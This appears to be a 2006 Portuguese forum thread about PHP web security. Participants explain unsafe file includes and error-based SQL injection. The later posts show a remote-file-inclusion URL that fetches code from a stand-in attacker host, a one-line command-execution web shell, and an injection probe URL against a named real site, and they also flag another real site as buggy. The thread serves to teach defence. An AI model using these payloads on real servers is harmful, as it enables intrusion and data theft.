Gurzi Posted August 2, 2006 at 08:10 PM Report #41801 Posted August 2, 2006 at 08:10 PM Pessoal, alguem pode fazer um mega artigo, ou postar links sobre erros comuns quando se desenvolve um web site usando php que possa por em causa a segurança de um site ? dando formas de entrar e formas de resolver esse problema por favor..
kingless Posted August 3, 2006 at 04:23 AM Report #41872 Posted August 3, 2006 at 04:23 AM Alguns links: http://www.sosdesigners.com/colunas-12.html http://phpbrasil.com/articles/article.php/id/1092 http://phpbrasil.com/articles/article.php/id/1222 http://mega.ist.utl.pt/~ncpl/pres/seguranca-php.pdf http://neosite.ilogic.com.br/artigos/doc/php-seguro.pdf <- Acho que é o melhor Cumps
Gurzi Posted August 3, 2006 at 10:34 AM Author Report #41909 Posted August 3, 2006 at 10:34 AM Valeu 😛 Umas dúvidas que retirei dos artigos, onde vejo se o URL WRAPPER está activo ? e como é que as pessoas sabem se eu uso algo vulnerável ou não ? eles por exemplo falam neste erro : include("topo.php"); include ( $pagina ); include ("down.php"); sendo que o 2nd include está vulnerável, mas como é possivel a alguem ver o meu código ? só se eu o mostrar =D
kingless Posted August 3, 2006 at 11:16 AM Report #41921 Posted August 3, 2006 at 11:16 AM Pelo o input no teu site.. quando alguem acessar o teu site numa das páginas a url vai ter um link como por exemplo http://www.teu-site.com/index.php?pagina=livros.php&id=xxx ou então http://www.teu-site.com/index.php?pagina=livros&nome=xxx O que esta em bold ajuda o atacante a perceber que aquilo é o include de uma pagina... $pagina = $_GET['pagina']; include( $pagina ); ou include( $pagina .".php" );
QuickFire Posted August 3, 2006 at 11:23 AM Report #41923 Posted August 3, 2006 at 11:23 AM claro... mas isso é obvio... por exemplo: Tens uma pagina em que para mudares de secções utilizas isso, http://www.gurzi.com/index.php?include=lol.php Ai dá logo para ver a forma que tu usas 😛 E nestas coisas da segurança é mais por tentativa e erro e esse erro deve ser logo dos primeiros 🙂
kingless Posted August 3, 2006 at 11:31 AM Report #41924 Posted August 3, 2006 at 11:31 AM claro... mas isso é obvio... por exemplo: Tens uma pagina em que para mudares de secções utilizas isso, http://www.gurzi.com/index.php?include=lol.php Ai dá logo para ver a forma que tu usas 😛 E nestas coisas da segurança é mais por tentativa e erro e esse erro deve ser logo dos primeiros 🙂 Yep os erros dizem muita coisa ao atacante... tens aqui um exemplo de um erro que diz muita coisa http://www.eticanatv.org.br/pagina.php?id_pag=22%20SHOW%20TABLES; "Erro no query" isso mostra ao atacante que esta a ser executado um query a SQL apartir do input da url e o atacante tenta fazer uma SQL Injection ou seja executar querys na SQL apartir da url e pode até descrobrir as passwords ou apagar as tabelas da base de dados etc... Tem que se ter muito cuidado. EDIT: http://laboratoriopop.uol.com.br/pagina.php?abrir=texto_colunista.php&idcolunista=32 < esse site já tem uma bug
QuickFire Posted August 3, 2006 at 08:39 PM Report #42056 Posted August 3, 2006 at 08:39 PM kingless: por acaso esse site está bastante mal feito mas se a version do php fosse mais antiga estava já offline 😛 Não consegues assessar a files doutro servidor e tem as magic_quotes=on 😛
kingless Posted August 3, 2006 at 09:22 PM Report #42074 Posted August 3, 2006 at 09:22 PM kingless: por acaso esse site está bastante mal feito mas se a version do php fosse mais antiga estava já offline 😛 Não consegues assessar a files doutro servidor e tem as magic_quotes=on 😛 Consigo... O meu servidor (local) tem magic_quotes = on e eu consigo acessar as files apartir da url (criei uma bug e fiz um teste agora)
Gurzi Posted August 4, 2006 at 12:13 PM Author Report #42148 Posted August 4, 2006 at 12:13 PM mas e se o gajo usar $_POST ? já não aparece no link... mostra isso do bug, para eu perceber sff, ou se for grave, manda pm , abraço
kingless Posted August 4, 2006 at 07:54 PM Report #42299 Posted August 4, 2006 at 07:54 PM $_POST só é utilizado em formularios, e os links utilizam $_GET e $_REQUEST $minha_pagina = $_REQUEST['pagina']; include( ' $minha_pagina ' ); O atacante só precisa de escrever isso na url http://www.teu-site.com/index.php?pagina=http://www.atacante.com/ficheiro.txt?&cmd=id No site do atacante o ficheiro.txt tem o seguinte código echo system( $_GET['cmd'] ); Este código executa comandos no servidor do site vulneravel... o include( " $minha_pagina " ); vai incluir o site do atacante no servidor e o site do atacante tem um código que o deixa o atacante executar comandos no servidor e assim ele pode conseguir atacar o site e o servidor.
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now